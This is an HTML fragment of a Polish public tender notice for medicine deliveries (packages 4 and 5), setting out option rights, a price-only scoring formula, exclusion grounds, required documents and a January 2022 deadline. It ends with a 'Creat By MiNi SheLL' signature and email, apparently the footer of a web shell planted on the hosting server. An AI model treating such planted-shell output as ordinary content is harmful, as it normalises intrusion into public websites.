etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa leków - pakiet 4 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33690000-3 - Różne produkty lecznicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący<br/>dostawy Produktów, określonych w tabeli załącznika nr 1 do Umowy – oferty asortymentowo cenowej dla tego zadania („Prawo opcji”).<br/>2.Zamawiający jest uprawniony do złożenia oświadczenia o skorzystaniu z Prawa opcji nie<br/>później niż na 7 dni przed upływem terminu, na jaki Umowa została zawarta.<br/>3.Zamówienie realizowane w ramach prawa opcji (w całości lub w części) jest jednostronnym<br/>uprawnieniem Zamawiającego, a nie zobowiązaniem Zamawiającego, dlatego też<br/>nieskorzystanie przez Zamawiającego z prawa opcji (w całości lub w części) nie stanowi<br/>podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do<br/>Zamawiającego z tego tytułu.<br/>4. Skorzystanie z prawa opcji nie wymaga sporządzenia aneksu do Umowy.<br/>5.W przypadku nieskorzystania przez Zamawiającego z prawa opcji (w całości lub w części)<br/>Wykonawca ma obowiązek wykonania wszystkich ciążących na nim obowiązków wynikających z<br/>realizacji zamówienia podstawowego.<br/>6.Wartość prawa opcji dla danego zadania nie może przekroczyć 50 % wartości wynagrodzenia<br/>gwarantowanego za wykonanie tego zadania, określonego w § 2 ust. 1.<br/>7.Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które<br/>obowiązują przy realizacji zamówienia podstawowego. W konsekwencji do zlecania dodatkowej<br/>dostawy będącej przedmiotem prawa opcji stosuje się odpowiednio postanowienia odnoszące<br/>się do pozostałego zakresu Przedmiotu umowy, w szczególności w zakresie sposobu<br/>wykonywania Umowy, odbiorów, zasad płatności wynagrodzenia, rękojmi, kar umownych oraz zasad odpowiedzialności. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1.1 Cena oferty brutto ( C) 100 %<br/>2. Punkty będą przyznawane wg następujących zasad:<br/>Cena oferty (C):<br/>C = (Cmin / Cob) x 100 pkt<br/>gdzie:<br/>Cmin - cena brutto najniższa,<br/>Cob - cena brutto oferty badanej<br/>3. W celu obliczenia punktów wyniki poszczególnych działań matematycznych będą zaokrąglane do<br/>dwóch miejsc po przecinku.<br/>4. W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez<br/>wykonawców wyjaśnień treści złożonych przez nich ofert.<br/>5. Za ofertę najkorzystniejszą Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa leków - pakiet 5 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33690000-3 - Różne produkty lecznicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący<br/>dostawy Produktów, określonych w tabeli załącznika nr 1 do Umowy – oferty asortymentowo cenowej dla tego zadania („Prawo opcji”).<br/>2.Zamawiający jest uprawniony do złożenia oświadczenia o skorzystaniu z Prawa opcji nie<br/>później niż na 7 dni przed upływem terminu, na jaki Umowa została zawarta.<br/>3.Zamówienie realizowane w ramach prawa opcji (w całości lub w części) jest jednostronnym<br/>uprawnieniem Zamawiającego, a nie zobowiązaniem Zamawiającego, dlatego też<br/>nieskorzystanie przez Zamawiającego z prawa opcji (w całości lub w części) nie stanowi<br/>podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do<br/>Zamawiającego z tego tytułu.<br/>4. Skorzystanie z prawa opcji nie wymaga sporządzenia aneksu do Umowy.<br/>5.W przypadku nieskorzystania przez Zamawiającego z prawa opcji (w całości lub w części)<br/>Wykonawca ma obowiązek wykonania wszystkich ciążących na nim obowiązków wynikających z<br/>realizacji zamówienia podstawowego.<br/>6.Wartość prawa opcji dla danego zadania nie może przekroczyć 50 % wartości wynagrodzenia<br/>gwarantowanego za wykonanie tego zadania, określonego w § 2 ust. 1.<br/>7.Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które<br/>obowiązują przy realizacji zamówienia podstawowego. W konsekwencji do zlecania dodatkowej<br/>dostawy będącej przedmiotem prawa opcji stosuje się odpowiednio postanowienia odnoszące<br/>się do pozostałego zakresu Przedmiotu umowy, w szczególności w zakresie sposobu<br/>wykonywania Umowy, odbiorów, zasad płatności wynagrodzenia, rękojmi, kar umownych oraz zasad odpowiedzialności. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1.1 Cena oferty brutto ( C) 100 %<br/>2. Punkty będą przyznawane wg następujących zasad:<br/>Cena oferty (C):<br/>C = (Cmin / Cob) x 100 pkt<br/>gdzie:<br/>Cmin - cena brutto najniższa,<br/>Cob - cena brutto oferty badanej<br/>3. W celu obliczenia punktów wyniki poszczególnych działań matematycznych będą zaokrąglane do<br/>dwóch miejsc po przecinku.<br/>4. W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez<br/>wykonawców wyjaśnień treści złożonych przez nich ofert.<br/>5. Za ofertę najkorzystniejszą Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia, w<br/>wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych (oświadczeń lub dokumentów potwierdzających, że wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowania), tj. takie dokumenty jak:<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W razie zamiaru zastosowania przez wykonawcę rozwiązań równoważnych, w celu weryfikacji<br/>jakości parametrów oferowanych rozwiązań równównoważnych, zamawiający żąda załączenia<br/>dokumentów do oferty z oznaczeniem producenta oraz typu oferowanego produktu<br/>określających parametry w zakresie równoważności z określonymi w opisie przedmiotu<br/>zamówienia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> dokumentów z oznaczeniem producenta oraz typu oferowanego produktu określających<br/>parametry w zakresie równoważności z określonymi w opisie przedmiotu zamówienia <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta powinna zawierać:<br/>1. wypełniony formularz ofertowy wykonawcy - załącznik nr 1 do SWZ;<br/>2. wypełniony wykaz asortymentowo - cenowy - załącznik nr 3 do SWZ;<br/>3. oświadczenia o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału<br/>w postępowaniu - załącznik nr 2 do SWZ; w przypadku wykonawców wspólnie ubiegających się<br/>o zamówienie ww. oświadczenie składa każdy z nich;<br/>4. dokumenty potwierdzające umocowanie do reprezentacji wykonawcy, w tym pełnomocnictwo<br/>ustanowione do reprezentowania wykonawcy, także wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego.<br/>5. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego<br/>dotyczące dostaw wykonywanych przez poszczególnych wykonawców (składane w trybie art.<br/>117 ust. 4 ustawy Pzp) (załącznik nr 5 do SWZ).<br/>6. dokumenty, o których mowa w rozdz. IX SWZ (jeżeli dotyczy).<br/>3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, zamiast dokumentów, o których mowa w pkt. 2 powyżej, składa dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż<br/>3 miesiące przed ich złożeniem. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, nie wydaje się takich dokumentów, zastępuje się je dokumentem zawierającym<br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą,<br/>lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub<br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego,<br/>właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Oświadczenie<br/>powinno został złożone nie wcześniej niż 3 miesiące przed jego złożeniem w Postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wraz z ofertą wykonawca zobowiązany jest złożyć: aktualne na dzień składania ofert<br/>oświadczenie o niepodleganiu wykluczeniu z postępowania, w<br/>zakresie wskazanym w SWZ. W przypadku, gdy o zamówienie ubiega się dwa lub więcej<br/>podmiotów oświadczenia te powinny być złożone przez każdego z nich. Powyższe oświadczenie<br/>wykonawca składa według wzoru stanowiącego załącznik nr 2 do SWZ. Ponadto Wykonawca<br/>składa oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego dotyczące usług wykonywanych przez poszczególnych wykonawców (składane w<br/>trybie art.117 ust. 4 ustawy PZP (załącznik nr 5 do SWZ). Przed podpisaniem umowy<br/>Wykonawca dostarczy Zamawiającemu umowę regulującą współpracę partnerów przy realizacji<br/>przedmiotowego zamówienia, w przypadku, gdy za ofertę najkorzystniejszą uznano ofertę<br/>złożoną przez partnerów ubiegających się wspólnie o udzielenie niniejszego zamówienia. Wraz z ofertą Wykonawca zobowiązany jest złożyć dokumentu potwierdzające umocowanie do<br/>reprezentacji Wykonawcy, w tym<br/>pełnomocnictwo ustanowione do reprezentowania Wykonawcy,<br/>także Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Z uwagi na limit znaków Zamawiający zawarł informacje o zakresie i warunkach zmian umowy 7 projektu umowy (załącznika nr 4 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zpo.swinoujscie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com